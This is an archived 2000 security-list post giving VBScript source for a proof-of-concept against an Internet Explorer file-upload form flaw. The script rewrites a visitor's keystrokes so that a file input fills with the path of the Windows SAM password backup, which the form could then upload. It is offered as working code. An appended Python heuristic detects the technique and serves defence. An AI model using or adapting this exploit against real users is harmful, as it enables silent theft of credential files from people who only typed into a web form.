SECURITYVULNS:DOC:1043
Dec 08, 2000 - 12:00 a.m.

Exploit Code for File Input field advisory.

I have coded an exploit example for the "File Upload via Form" vulnerability
recently mentioned by Microsoft Security.

Here's the source for it (well, most of the source). If you would like the
whole source, email me. I'll send it as an attachment.

--------------snip------------------

!script language="VBScript">
'A lot of this isn't pretty, I don't have much time for this kind of stuff.
'Make changes as you wish, but be sure to include me (key) in your version.

'Declare stuff
Dim userKey
Dim charCount
Dim getFile
Dim myArray

'67|58|47|87|73|78|78|84|47|82|69|80|65|73|82|47|83|65|77|46|95
'c : \ w i n n t \ r e p a i r \ s a m . _

'Has to be backwards, that's the order I push it into the File field.
'95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67
'_ . m a s \ r i a p e r \ t n n i w \ : c

'Set getFile with the correct keycodes
getFile = "95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67"

'ReDim myArray to correct UBound
ReDim myArray(Len(getFile)/3)

'Index of array to use
charCount = 0

'Set myArray with a split version of getfile
myArray = split(getFile, "|")

'This is activated anytime form1.file gains the focus
Sub myFocus()
    document.form1.userInput.focus
End Sub

'This is activated with the onKeyPress event of userInput
Sub myFuncFirst()
    If charCount < (Len(getFile)/3) Then
        'Find the key the user pressed
        userKey = chr(window.event.keyCode)
        'Change that key to the keycode we want
        window.event.keyCode = cint(myArray(charCount))
        'Set focus to form1.file so that our key gets sent to it
        document.form1.file.focus
        'Make userInput reflect the user's change
        document.form1.userInput.value = document.form1.userInput.value + userKey
        'Increment charCount to the next char we want
        charCount = charCount + 1
    End If
End Sub
!/script>

----------snip---------

There are some issues to work out, but I believe this is a pretty good
example. Hey, it works doesn't it?

Mail me (disk_key<AT>hotmail.com) if you have questions/comments. I have
tested on IE 5.0 and IE 5.5.

Goodbye,
key
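
A defender-side heuristic for the technique in the post above, as an added example that is not part of the original message: it flags a page whose script both assigns to `event.keyCode` and moves focus to an `<input type="file">`. The regexes, the class and function names and both sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# A statement that assigns to event.keyCode (comparisons inside If/if are skipped).
KEYCODE_WRITE = re.compile(r"^\s*(?:window\.)?event\.keyCode\s*=(?!=)", re.I | re.M)
# element.focus call; group 1 is the element name just before .focus
FOCUS_CALL = re.compile(r"\.(\w+)\.focus\b", re.I)

class Collector(HTMLParser):
    """Records names/ids of file inputs and the text of each script block."""
    def __init__(self):
        super().__init__()
        self.file_inputs, self.scripts, self.in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "file":
            self.file_inputs.update(a[k].lower() for k in ("name", "id") if a.get(k))
        elif tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def find_keystroke_redirect(html):
    """Return file-input names focused by a script that also rewrites keyCode."""
    c = Collector()
    c.feed(html)
    c.close()
    hits = set()
    for body in c.scripts:
        if KEYCODE_WRITE.search(body):
            hits |= {m.lower() for m in FOCUS_CALL.findall(body)} & c.file_inputs
    return sorted(hits)

# Constructed samples (not from the post): one flagged page, one benign page.
FLAGGED = """<form name="f1"><input type="file" name="upload"></form>
<script language="VBScript">
window.event.keyCode = 65
document.f1.upload.focus
</script>"""
BENIGN = """<form name="f2"><input type="file" name="upload"><input name="q"></form>
<script>function k() { if (event.keyCode == 13) document.f2.q.focus(); }</script>"""
```

This is a static text heuristic: it misses script that reaches the file field indirectly and is meant as a triage signal for content filters, not a verdict.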

